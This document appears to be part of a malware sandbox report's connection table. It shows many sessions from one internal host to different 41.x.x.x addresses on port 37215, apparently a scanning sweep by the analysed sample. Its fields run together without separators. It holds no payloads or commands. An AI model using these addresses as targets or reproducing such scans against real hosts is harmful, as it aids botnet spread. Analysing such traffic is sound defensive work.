                                                                            3685192.168.2.154463041.72.133.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3686192.168.2.154753441.221.189.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3687192.168.2.155711041.157.13.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3688192.168.2.156055841.120.23.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3689192.168.2.154465041.133.64.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3690192.168.2.155646041.126.159.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3691192.168.2.154391841.144.29.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3692192.168.2.154006241.154.16.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3693192.168.2.153948641.249.138.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3694192.168.2.154181441.72.253.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3695192.168.2.155942641.93.72.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3696192.168.2.154389641.224.250.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3697192.168.2.156075441.235.51.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3698192.168.2.153941241.180.227.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3699192.168.2.153784241.249.229.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3700192.168.2.155133841.9.129.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3701192.168.2.154670041.226.135.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3702192.168.2.154661441.6.245.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3703192.168.2.153493841.129.55.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3704192.168.2.154817241.54.138.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3705192.168.2.155940441.221.43.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3706192.168.2.155785641.97.65.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3707192.168.2.154156041.156.85.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3708192.168.2.153422441.208.118.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3709192.168.2.153569241.205.106.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3710192.168.2.154349241.88.35.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3711192.168.2.153525441.89.112.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3712192.168.2.154349841.16.245.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3713192.168.2.153787241.122.171.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3714192.168.2.154356041.118.11.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3715192.168.2.154419841.243.92.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3716192.168.2.155785641.46.176.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3717192.168.2.155519841.107.46.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3718192.168.2.154333241.212.15.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3719192.168.2.155652041.175.201.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3720192.168.2.153788641.95.62.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3721192.168.2.153479441.208.241.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3722192.168.2.154325241.134.221.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3723192.168.2.154078841.223.180.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3724192.168.2.155083441.243.213.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3725192.168.2.153970441.15.195.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3726192.168.2.155786841.41.193.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3727192.168.2.155698041.64.130.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3728192.168.2.154408841.40.20.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3729192.168.2.154179441.253.150.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3730192.168.2.153509641.178.29.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3731192.168.2.155252041.137.95.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3732192.168.2.155814841.160.45.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3733192.168.2.155815641.252.163.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3734192.168.2.154647241.9.201.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3735192.168.2.156081041.80.144.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3736192.168.2.155838241.182.115.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3737192.168.2.154922041.136.216.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3738192.168.2.153765041.128.234.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3739192.168.2.155143241.209.237.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3740192.168.2.155776441.132.103.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3741192.168.2.153886841.5.89.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3742192.168.2.155529041.218.99.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3743192.168.2.155079441.106.143.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3744192.168.2.155173441.148.82.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3745192.168.2.155714041.122.52.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3746192.168.2.155361041.117.177.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3747192.168.2.153430441.89.38.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3748192.168.2.155784641.224.100.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3749192.168.2.153553241.57.143.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3750192.168.2.155575241.249.98.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3751192.168.2.153797441.168.251.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3752192.168.2.154291241.148.102.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3753192.168.2.153884641.45.100.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3754192.168.2.155781441.104.191.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3755192.168.2.155157841.136.243.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3756192.168.2.155858041.48.217.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3757192.168.2.154507041.52.147.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3758192.168.2.154595041.21.145.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3759192.168.2.155670641.7.76.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3760192.168.2.155183441.97.155.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3761192.168.2.154496841.127.167.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3762192.168.2.154225841.171.80.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3763192.168.2.154561441.236.162.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3764192.168.2.154386441.53.148.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3765192.168.2.155902841.84.105.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3766192.168.2.153798241.200.224.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3767192.168.2.153435841.160.38.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3768192.168.2.153970041.250.58.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3769192.168.2.153447241.90.183.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3770192.168.2.154855441.209.150.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3771192.168.2.154430441.217.217.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3772192.168.2.153937241.86.255.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3773192.168.2.153662841.62.126.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3774192.168.2.155492441.185.209.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3775192.168.2.154261041.38.48.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3776192.168.2.155412241.5.184.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3777192.168.2.154134041.77.143.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3778192.168.2.155534441.241.37.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3779192.168.2.154979041.117.25.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3780192.168.2.154688441.67.41.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3781192.168.2.155136241.148.68.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3782192.168.2.155059641.20.65.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3783192.168.2.155633241.152.115.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3784192.168.2.153323841.250.55.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3785192.168.2.153517641.199.250.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3786192.168.2.154741641.87.189.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3787192.168.2.154449641.209.166.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3788192.168.2.155080841.126.9.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3789192.168.2.156094041.237.215.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3790192.168.2.155071641.159.142.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3791192.168.2.155104841.248.49.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3792192.168.2.154734841.230.236.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3793192.168.2.154013441.119.73.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3794192.168.2.154508441.46.110.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3795192.168.2.153836041.60.136.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3796192.168.2.154295241.174.62.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3797192.168.2.154152241.97.136.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3798192.168.2.155176441.11.242.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3799192.168.2.154065841.139.27.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3800192.168.2.154392241.255.15.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3801192.168.2.153793241.161.231.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3802192.168.2.155185441.161.215.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3803192.168.2.154989041.19.205.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3804192.168.2.153357841.111.98.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3805192.168.2.153353241.35.50.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3806192.168.2.155750441.10.24.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3807192.168.2.155984841.214.119.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3808192.168.2.155104241.20.119.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3809192.168.2.154650041.37.104.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3810192.168.2.154043641.250.202.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3811192.168.2.155508841.0.118.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3812192.168.2.154029641.213.114.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3813192.168.2.155131841.170.15.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3814192.168.2.154146841.221.36.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3815192.168.2.154333441.228.253.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3816192.168.2.155485641.195.42.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3817192.168.2.154469441.24.16.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3818192.168.2.154502641.133.153.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3819192.168.2.153358841.205.239.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3820192.168.2.153941641.200.35.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3821192.168.2.155206241.114.214.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3822192.168.2.156015241.159.95.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3823192.168.2.155032441.247.99.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3824192.168.2.155467841.59.236.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3825192.168.2.153807441.171.184.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3826192.168.2.156019441.220.79.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3827192.168.2.153632441.117.87.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3828192.168.2.156098641.165.151.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3829192.168.2.154915241.2.42.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3830192.168.2.155535241.133.15.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3831192.168.2.155728041.121.199.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3832192.168.2.155588241.137.36.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3833192.168.2.155660441.181.30.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3834192.168.2.154824841.168.6.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3835192.168.2.153363241.211.132.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3836192.168.2.153854041.213.201.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3837192.168.2.153832041.167.250.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3838192.168.2.155724041.129.101.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3839192.168.2.153591641.37.119.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3840192.168.2.155215441.253.53.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3841192.168.2.155354041.120.42.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3842192.168.2.154460441.243.66.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3843192.168.2.155001641.111.96.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3844192.168.2.153497841.144.244.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3845192.168.2.155613641.176.242.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3846192.168.2.154561841.229.107.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3847192.168.2.156085041.218.92.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3848192.168.2.154346441.99.207.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3849192.168.2.155565041.28.114.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3850192.168.2.155005841.80.34.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3851192.168.2.155259041.33.148.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3852192.168.2.153855041.184.230.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3853192.168.2.153633041.139.153.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3854192.168.2.155082641.87.73.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3855192.168.2.154489241.246.77.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3856192.168.2.155929441.214.75.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3857192.168.2.156012441.52.231.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3858192.168.2.154943241.196.30.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3859192.168.2.155743041.147.106.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3860192.168.2.153846841.225.195.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3861192.168.2.155804041.164.91.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3862192.168.2.154340841.15.162.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3863192.168.2.154827241.42.59.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3864192.168.2.153711441.20.127.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3865192.168.2.154703241.20.16.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3866192.168.2.155450041.24.101.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3867192.168.2.153997241.109.216.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3868192.168.2.155092441.1.185.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3869192.168.2.153563441.123.180.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3870192.168.2.154833841.10.215.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3871192.168.2.154240041.159.180.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3872192.168.2.155189841.159.27.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3873192.168.2.156021641.11.223.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3874192.168.2.155375641.238.164.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3875192.168.2.153820841.95.56.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3876192.168.2.154956241.151.180.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3877192.168.2.154716041.244.94.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3878192.168.2.153484041.240.117.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3879192.168.2.155403041.186.132.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3880192.168.2.155165241.122.101.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3881192.168.2.155639841.172.240.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3882192.168.2.154217041.7.196.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3883192.168.2.154100241.190.136.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3884192.168.2.155668241.128.45.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3885192.168.2.154411841.74.254.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3886192.168.2.153904841.207.175.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3887192.168.2.153722041.227.167.15037215
                                                                            TimestampBytes transferredDirectionData


